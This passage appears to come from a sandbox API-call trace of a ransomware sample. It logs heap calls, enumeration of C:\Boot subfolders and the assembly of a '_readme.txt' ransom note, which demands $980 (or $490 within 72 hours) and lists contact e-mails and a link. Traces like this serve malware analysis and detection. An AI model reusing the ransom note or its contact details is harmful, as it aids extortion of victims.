hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.891] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.891] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.892] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.892] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.892] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.893] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.908] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0179.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.908] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.908] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.908] PathFindFileNameW (pszPath="") returned="" [0179.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.908] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.909] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0179.909] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0179.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.909] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.909] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0179.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.909] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0179.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.910] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.910] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.910] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.912] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.913] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.913] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.913] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.913] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.913] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.919] HeapFree (in: 